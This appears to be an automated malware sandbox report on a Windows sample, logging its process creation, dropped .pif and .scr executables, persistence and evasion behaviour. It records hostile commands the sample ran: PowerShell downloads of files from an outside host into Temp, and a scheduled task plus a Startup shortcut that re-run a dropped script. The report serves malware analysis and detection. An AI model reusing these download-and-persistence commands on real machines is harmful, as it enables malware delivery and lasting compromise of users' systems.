Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://myguyapp.com/f.pdf' -OutFile 'C:\Users\user\AppData\Local\Temp\f.pdf'"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'http://myguyapp.com/msword.zip' -OutFile 'C:\Users\user\AppData\Local\Temp\msword.zip'"	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe

Code function: 22_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,

22_2_004062FC

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00C1E4C7 push cs; retf	32_2_00C1E4C8
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00C1E4F4 push cs; retf	32_2_00C1E4F5
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00BFC6D5 push 00000046h; ret	32_2_00BFC6D7
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00C1E9DB push cs; retf	32_2_00C1E9DC
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00C1E93F push edi; ret	32_2_00C1E941
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00C1EA58 push esi; ret	32_2_00C1EA5A
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00C18B75 push ecx; ret	32_2_00C18B88
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00C1EC33 push esi; ret	32_2_00C1EC35
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00C1ED41 push cs; retf	32_2_00C1ED42
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00C1ED1C push edi; ret	32_2_00C1ED1E
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00C31A8D push ss; ret	32_2_00C31A94
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00BF9C04 push 00000024h; ret	32_2_00BF9C06
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00BF9C00 push 00000024h; ret	32_2_00BF9C02
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00BF9C68 push 00000024h; ret	32_2_00BF9C6A
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00BF9C64 push 00000024h; ret	32_2_00BF9C66
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00BF9C60 push 00000024h; ret	32_2_00BF9C62
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00BF7DFA push es; ret	32_2_00BF7DFD
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00BF7DF0 push es; ret	32_2_00BF7DF1
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00BF7DEB push es; ret	32_2_00BF7DED
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00BF7E22 push es; ret	32_2_00BF7E25
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 40_2_00F7E93F push edi; ret	40_2_00F7E941
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 40_2_00F7EA58 push esi; ret	40_2_00F7EA5A
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 40_2_00F78B75 push ecx; ret	40_2_00F78B88
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 40_2_00F7EC33 push esi; ret	40_2_00F7EC35
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 40_2_00F7ED1C push edi; ret	40_2_00F7ED1E
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 42_2_00EEE93F push edi; ret	42_2_00EEE941
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 42_2_00EEEA58 push esi; ret	42_2_00EEEA5A
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 42_2_00EE8B75 push ecx; ret	42_2_00EE8B88
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 42_2_00EEEC33 push esi; ret	42_2_00EEEC35
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 42_2_00EEED1C push edi; ret	42_2_00EEED1E

Source: 32.3.Carter.pif.3db2268.1.raw.unpack, OfpCuG0X22QLMT.cs	High entropy of concatenated method names: 'nYwX372KteT5t2', 'segcmNagSiz7hL', 'yb0jQST0YwMHe1', '_0RenYuPKc4bvZA', 'JZsQDAM9n6EtQO', 'nH0p3C37Fxk65v', 'wQuomVoWPHIdrS', 'KcyJvFgDlyg3yX', 'loFybsLcslp7YB', 'OqFzKE7yCCpgGL'
Source: 32.3.Carter.pif.3db2268.1.raw.unpack, kqeFvQIpnkai8I7JJTganEHGxWh1A.cs	High entropy of concatenated method names: 'aRwUsZ42Qp2Iu55HZmFMSXPDzzjZF', 'r9VwT22LhaEvtkx68iMROo7ndw3YZ', 'jrU22mrrq7mmJu6zwT9QAgvUnX9CJ', 'V9WvHsnCndciRvznYV6E8Iiw7Ijry', 'sGZ2ry3eOxX0Kx', 'yIBnpeSQWl0II9', 'xgpfXiKspkv7Qk', '_43XjyQXj7XyIa1', 'a89z5bafQjfyZs', 'Tk551t0Ool3k8m'
Source: 32.3.Carter.pif.3db2268.1.raw.unpack, GKj04XVvJiEzT5.cs	High entropy of concatenated method names: '_31TqwEG7d5XQHj', 'lxcCKU7qpJsmyP', 'YZYM9q6UFN8qLN', 'qbUFKJUwRHfrx0', 'yp447Ls9FeU2rB', 'v2qtSP4rX7Lk2T', '_913bZMPdi8gyo6', 'ub5OHWFnNsEeGb', 'J3wXGNI0TDWKm6', 'LnW574bP2vfKev'
Source: 32.3.Carter.pif.3db2268.1.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs	High entropy of concatenated method names: 'A8tvE0DZ8bvmGcdzUXcKpnPMdpDux', 'W2w4gwDiJR1Z2UwSx8jWJmGy2ytCd', 'ft4DTvZvc4qN6kRvp59xULzP1mvg8', 'h5DA5Rai9oL4jV2ulFHvRbWYSJygJ', 'O4KRgJLa3ckMhcPaD7WwIhODI7hWV', 'YWUQmw7KiGzjOEEcq4lQEbMvcLlhm', 'EJyK88GxspHTRmtV2qD89iF21FbSy', 'IhlkrpmLJYz1G6gP55j78Ej4gKn7F', 'm8302rRfONzkL3YJxiETt06WijQVn', 'P9l9FPyls55tddMfrIzTDmtDXAy1p'
Source: 32.3.Carter.pif.3db2268.1.raw.unpack, 75lcEdvWjHm39L5ktP3tlqVbSoumD.cs	High entropy of concatenated method names: 'GLV28Q7RWReL58LNXG4dRIdIK2TEN', 'SqFko7T9STuWHJvrJgezXiBwfKMUK', 'W4PVwXl8ze5GoIs5LD920v8iPvDpI', 'VuiMLbYUZ5mbwdX2kA30fKD2DAOuV', 'lkt0AxMEBI88hk7IoXbH4QyieI6eA', 'lfIrGorQseyo6qZGq1AaQGw9LAMH7', 'mMD8nCbTfzppkmkizs1ZJLk6b6GTh', 'NAsi31w08xZTNd4EnIYvztAjeNjfl', 'dwTlKIVNZIbv7CCltiTquHRE8Fbjk', 'NAmq1jGo4CTjwh'
Source: 32.3.Carter.pif.3db2268.1.raw.unpack, JbeTyT6ozehDZJ.cs	High entropy of concatenated method names: '_4qRRAkWwEHf3Zd', 'vRsh53PpGgdqA0', '_8Hq2Or18riYaIv', '_8mRH3Hyg3XD8u5', 'EdcUKUZTwxyIgi', '_6vgoIitpz9FToY', 'kF9NScHwDxQCcQ', 'ebBHLsDcmu1A20', 'sfMOP7twzn5TxB', 'TEyNm0Eygu7184'
Source: 32.3.Carter.pif.3db2268.1.raw.unpack, qP0JoydMkk5flJ2CzcAH0gMxtb0EV.cs	High entropy of concatenated method names: '_2mGh5CdvITFqIEgkpZMeXEYaYAyDB', '_9BeG36XnpwBXeXYTPZ4EKlMNJsvBQ', 'nZq2XPd9g1M2B2LsBPHPhOcwls9uQ', 'IXpGxkIWH8t4eoPAyitkJLIMPKWb6', 'w266axfymAlJYlHxOy7UD7CgTETRm', 'ImNQKUnqPr9jIMbbRrVqiJBKaucLC', 'hvtupL1aknPiuTNtO4sMyUTjVVlCG', 'LuqfnAbPcScBSkmye7C3NBjgwO957', 'qHF4AT3e2DvOntMCkk5fkm78V3UET', 'CLYFb0PcaLLnKDeZTkE3vmfjdeJfz'
Source: 32.3.Carter.pif.3e14c38.0.raw.unpack, OfpCuG0X22QLMT.cs	High entropy of concatenated method names: 'nYwX372KteT5t2', 'segcmNagSiz7hL', 'yb0jQST0YwMHe1', '_0RenYuPKc4bvZA', 'JZsQDAM9n6EtQO', 'nH0p3C37Fxk65v', 'wQuomVoWPHIdrS', 'KcyJvFgDlyg3yX', 'loFybsLcslp7YB', 'OqFzKE7yCCpgGL'
Source: 32.3.Carter.pif.3e14c38.0.raw.unpack, kqeFvQIpnkai8I7JJTganEHGxWh1A.cs	High entropy of concatenated method names: 'aRwUsZ42Qp2Iu55HZmFMSXPDzzjZF', 'r9VwT22LhaEvtkx68iMROo7ndw3YZ', 'jrU22mrrq7mmJu6zwT9QAgvUnX9CJ', 'V9WvHsnCndciRvznYV6E8Iiw7Ijry', 'sGZ2ry3eOxX0Kx', 'yIBnpeSQWl0II9', 'xgpfXiKspkv7Qk', '_43XjyQXj7XyIa1', 'a89z5bafQjfyZs', 'Tk551t0Ool3k8m'
Source: 32.3.Carter.pif.3e14c38.0.raw.unpack, GKj04XVvJiEzT5.cs	High entropy of concatenated method names: '_31TqwEG7d5XQHj', 'lxcCKU7qpJsmyP', 'YZYM9q6UFN8qLN', 'qbUFKJUwRHfrx0', 'yp447Ls9FeU2rB', 'v2qtSP4rX7Lk2T', '_913bZMPdi8gyo6', 'ub5OHWFnNsEeGb', 'J3wXGNI0TDWKm6', 'LnW574bP2vfKev'
Source: 32.3.Carter.pif.3e14c38.0.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs	High entropy of concatenated method names: 'A8tvE0DZ8bvmGcdzUXcKpnPMdpDux', 'W2w4gwDiJR1Z2UwSx8jWJmGy2ytCd', 'ft4DTvZvc4qN6kRvp59xULzP1mvg8', 'h5DA5Rai9oL4jV2ulFHvRbWYSJygJ', 'O4KRgJLa3ckMhcPaD7WwIhODI7hWV', 'YWUQmw7KiGzjOEEcq4lQEbMvcLlhm', 'EJyK88GxspHTRmtV2qD89iF21FbSy', 'IhlkrpmLJYz1G6gP55j78Ej4gKn7F', 'm8302rRfONzkL3YJxiETt06WijQVn', 'P9l9FPyls55tddMfrIzTDmtDXAy1p'
Source: 32.3.Carter.pif.3e14c38.0.raw.unpack, 75lcEdvWjHm39L5ktP3tlqVbSoumD.cs	High entropy of concatenated method names: 'GLV28Q7RWReL58LNXG4dRIdIK2TEN', 'SqFko7T9STuWHJvrJgezXiBwfKMUK', 'W4PVwXl8ze5GoIs5LD920v8iPvDpI', 'VuiMLbYUZ5mbwdX2kA30fKD2DAOuV', 'lkt0AxMEBI88hk7IoXbH4QyieI6eA', 'lfIrGorQseyo6qZGq1AaQGw9LAMH7', 'mMD8nCbTfzppkmkizs1ZJLk6b6GTh', 'NAsi31w08xZTNd4EnIYvztAjeNjfl', 'dwTlKIVNZIbv7CCltiTquHRE8Fbjk', 'NAmq1jGo4CTjwh'
Source: 32.3.Carter.pif.3e14c38.0.raw.unpack, JbeTyT6ozehDZJ.cs	High entropy of concatenated method names: '_4qRRAkWwEHf3Zd', 'vRsh53PpGgdqA0', '_8Hq2Or18riYaIv', '_8mRH3Hyg3XD8u5', 'EdcUKUZTwxyIgi', '_6vgoIitpz9FToY', 'kF9NScHwDxQCcQ', 'ebBHLsDcmu1A20', 'sfMOP7twzn5TxB', 'TEyNm0Eygu7184'
Source: 32.3.Carter.pif.3e14c38.0.raw.unpack, qP0JoydMkk5flJ2CzcAH0gMxtb0EV.cs	High entropy of concatenated method names: '_2mGh5CdvITFqIEgkpZMeXEYaYAyDB', '_9BeG36XnpwBXeXYTPZ4EKlMNJsvBQ', 'nZq2XPd9g1M2B2LsBPHPhOcwls9uQ', 'IXpGxkIWH8t4eoPAyitkJLIMPKWb6', 'w266axfymAlJYlHxOy7UD7CgTETRm', 'ImNQKUnqPr9jIMbbRrVqiJBKaucLC', 'hvtupL1aknPiuTNtO4sMyUTjVVlCG', 'LuqfnAbPcScBSkmye7C3NBjgwO957', 'qHF4AT3e2DvOntMCkk5fkm78V3UET', 'CLYFb0PcaLLnKDeZTkE3vmfjdeJfz'

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\220239\Carter.pif			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	File created: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr			Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	File created: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	File created: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00C759B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	32_2_00C759B3
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00C05EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	32_2_00C05EDA
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 40_2_00FD59B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	40_2_00FD59B3
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 40_2_00F65EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	40_2_00F65EDA
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 42_2_00F459B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	42_2_00F459B3
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 42_2_00ED5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	42_2_00ED5EDA

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif

Code function: 32_2_00C133B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

32_2_00C133B7

Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
